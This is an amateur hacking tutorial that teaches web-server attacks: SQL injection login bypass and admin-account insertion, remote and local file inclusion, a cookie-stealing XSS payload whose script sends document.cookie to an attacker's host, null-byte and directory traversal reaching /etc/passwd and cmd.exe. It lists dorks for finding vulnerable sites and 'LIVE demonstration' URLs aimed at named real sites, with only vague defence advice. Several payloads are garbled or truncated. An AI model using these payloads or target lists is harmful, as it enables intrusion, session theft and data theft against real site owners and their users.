[PAPER] The most used methods to attack a Webserver

[GODFATHER]

====The most used methods to penetrate a web-server=====
My security tutorial
By fl0 fl0w

Table of contents
1)Disclaimer
---------------------------
2)Hackers Manifesto
3)Introduction
4)SQL Injection-login bypass
5)SQL Injection-table modification
6)RFI
7)LFI
8)RADF
9)XSS
10)NULL byte –CGI Exploatation
11)Directory Transversa l
12)For more documentation : video tutorials+papaers+articles+books
13)About me

1)Disclaimer

*This tutorial is destined to increase your knoladge in internet security,penetrating web-servers;
* This document was prepared for informational purposes only;
*This document can not be multiplied without the authors permission.

2)Hackers Manifesto
I am here to exploit,to learn how thinks work.I’ve always put questions and I ‘ve always seeked for more than two hours.My crime is one of coriouzity,I exploit what you dream of I am over ambition and will.If you want to enter this world , break away ,forget all you have learned from the others ,the ignorants ,those without interest and learn to do exactly what you want with your knowledge.
I’m in the underground for 4 years ,from my first contact with the computer since 10 years ago ,I was fascinated from the first moment of the infinit possibilities that it opens for a man.
You don’t know me ,so don’t judge me ! ONLY GOD can judge me !
If you feel something reading these lines that means that I am talking for you to,if not look away.
We have to help each other, hacking can not be defind ,hacking is a state of mind.
I thank all of you that helped and help me !
This is my manifesto !
3)The tutorial will be structured in two directions : vulnerabilities and fixing them.
A lot of people are macking tutorials but they just talk , I am going to realy explain a few methods as we go.I don’t consider myself a specialist but I know what I am talking about.
In the places where it says LIVE demonstration ,there I applied the metod on different web sites ,on my luck at the time.
You can download this tutorial among with the screenshots of the LIVE demonstration at this link : http://rapidshare.com/files/31493641...erver.rar.html

4)::::Method explained with LIVE demonstration::::
Sql injection is the method that exploits the errors from the code applications and it allows the attacker to inject SQL commands in the login forms ,feedback forms with the purpose to obtain acces to sensible information from the data base.SQL Injection has effect because the imput forms allow SQL expressions to penetrate directly in the data base.
Building programes with SQL to manipulate the commands from the data base and so getting acces.The most used is SQL login bypass,thru witch we inject in the login and password fieds.

Example ‘ OR 1=1—
URL scheme: http://site.com/index.php?id=0 ‘ OR 1=1—
Other comands : admin’—
‘ OR 0=0—
“ OR=0—
OR 0=0—
‘ HI OR 1=1—
" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x
We look for vulnerable sites with the following dorks :
”adminlogin.asp”
”login.asp
How to defend yourself from such attacks.
The system must be checked for any sort of vulnerability ,the codes need to be bug free and the applications and all that means infrastructure must be satinized.
At each change of the components it must be done a web security audit.
It has no sense for me to get in any more detailes and in plus I don’t know that well the SQL data base. If you don’t have a complex infrastructure that you have to take care of it isn’t forth for you to get more involved that you already are.

LIVE demonstration

CODE
http://alistrack.azleg.gov/rts/Login.asp


Username: ' or '='
Password: ' or '='



5)SQL Injection table modification
Here’s what we are going to do.
We are going to create an account with special rights.This method involves 3 steps : the generation of an error that must be understood ,it is important to see a certain table name ,after that we are going to inject commands to create an new privilegeate account.

At the username : ‘ HAVING 1=1
The error must contain a table name : user_member.id .
Then the injectiong of the commands : ‘UNION SELECT * FROM user_member WHERE USER_ID=’ADMIN’ GROUP BY USER_ID HAVING 1=1;--
After the error is generated we try :
‘INSERT INTO USER_MEMBER(USER_NAME,LOGIN_ID,PASSWORD,CREATION_D ATE)VALUES(‘HACKER’,’HACKED’,’
CKED’,GETDATE());--

Now if everything went well we shold be able to log in with :
-user : hacker
-password : hacked

6) ::::Method explained with LIVE demonstration::::
In this method what we actually what to do is upload a file ,an shell emulator on the web page,the vulnerable web page.When the web site calls another page to be displayed we will build a URL scheme whitin we will upload the emulator,getting acces to the entire server.
This method is much more than this ,this is only a form of it so read further more and more tutorials.
Here is a couple of dorks to find vulnerable web sites :
: inurl :”index.php?page=”
includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/nphp/nphpd.php?nphp_config[LangFile]=
/include/db.php?GLOBALS[rootdp]=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=

We test on : http://site.com/director_vulnerabil....p://google.com ,if the page opens in google in the site frame then it is vulnerable.

LIVE demonstration
Target:
CODE
http://www.2koillismaa.fi


CODE
http://www.2koillismaa.fi/~juhan/preview.php?file=SHELL




7)LFI ::::Method explained with LIVE demonstration::::
A code problem can have serious consecuinses ,this method is similarily to CGI Exploatation.In this live dem. I have accest the password folder from the UNIX server.Simple ,anyone can do this kind of stuff ,after a scan of a site and POC ! the greate hacker.This is lame stuff ! never use a scanner ,only if you have to ,or you are interested in a particular thing at the site.
At every vulnerability you have to understand the problem ,the code that generates it and so on.
Here is an example of an error :

<?php
$page = $_GET[page];
include($page);
?>
$page input is not satinized.



The content is cryptated ,but you can try with the bruteforce method using a program such as BrutUs.I searched for passwords of FTP accounts for instance.It depends on your luck to.

URL scheme used :
CODE
http://kleenrite.net/index.php?Tab=R...le=/etc/passwd


LIVE demonstration



8) RAFD ::::Method explained with LIVE demonstration::::
You try this more ‘blind’ in general because we don’t know for sure if it will work every time.
Remote Admin Password Disclosure,we try to acces folders from the inside.


URL scheme : http://www.site.com/files/uploaded/d...e=download.php
I have posted numerouse examples on other sites where I have found some serious info like passwords and so on.Here it isn’t such a big deal.
LIVE demonstration




Target :
CODE
http://www.wildlifetrusts.org

URL Scheme:
CODE
http://www.wildlifetrusts.org/files/...e=download.php


9)XSS ::::Method explained with LIVE demonstration::::
It is in a state of research and it is the future some say ,well I am going to present how you can find this vulnerability and how you can exploited but as I said at RFI you have to study seriously if you want to realy understand.
More exactly I’m going to refer to cookie stealing.For the test you proceed similarly as in SQL Injection.You look in forms and you try to inject simple scripts like : <script>alert(‘XSS whole’)</script>.The result is a alert window with the text “xss whole”, good now you know that you can try a more complex script.We will build a cookie stealer and I will show you how you can look for cookies directly from an URL scheme.
After we test it like so : script>alert(‘XSS whole’)</script> we do the following:
<?php
$cookie=$_GET[‘cookie’];
$variabila1=fopen(“cookies.txt”,”a”);
fwrite($variabila1,$cookie);
f.close($variabila1);

After that we save it as some_script.php.
Than buid a scheme like so to ‘plant’ the trap ,and we upload them on a arbitrary host that supports php.

<script>window.location=’http://site.com/jucarie.php?cookie=’+’document.cookie;</script>

LIVE demonstration



Target :
CODE
nbc.com

URL scheme :
CODE
http://nbcweb.resultpage.com/search?...3C%2Fscript%3E

If just done the test,I tried and further but sincerely I didn’t got lucky, because you need sensibile info not just an ordinary cookie stolen, you get the picture.

10)NULL byte-CGI Exploitation

CGI (or Common Gateway Interface) is a file that it is found on web servers and it gives control at cgi and pl files.The CGI scripts and folders are used for statistics ,forms and data base commands.NULL byte is used in programming and it says the end of a string.The CGI page acceses other pages like so :
Index.cgi?pageid=2
Here pagina2.html is shown but if we modify a little like so :
Index.cgi?pageid.cgi%00
We just added NULL byte and it comes to the end all the data in the URL.Now we do the following scheme :
Index.cgi?pageid=/etc/passwd%00
11) Directory Transversal
Directory Transversal is an HTTP exploit and it allows the attacker to acces folders from the inside the server and to execute commands from the server’s root.

· Acces Control Lists (ACLs)
· Root directory
These are two security protocols used on a server.In Access Control Lists the administrator puts limits on users and configurates all the other functions.Root directory stops users to acces files that contain sensibile data like CMD on the Windows platform and passwd folder on Linux/UNIX.
http://site.com/show.asp?view=../../...ows/system.ini
What we have done the following : the URL scheme makes a request to the show.asp page from the server and sends the view parameter with the value
=../../../../../Windows/system.ini .
../ represents the director we go one folder up.
Another scheme would be : http:/site.com/scripts/..%5c../Windows/System32/
cmd.exe?/c+dir+c: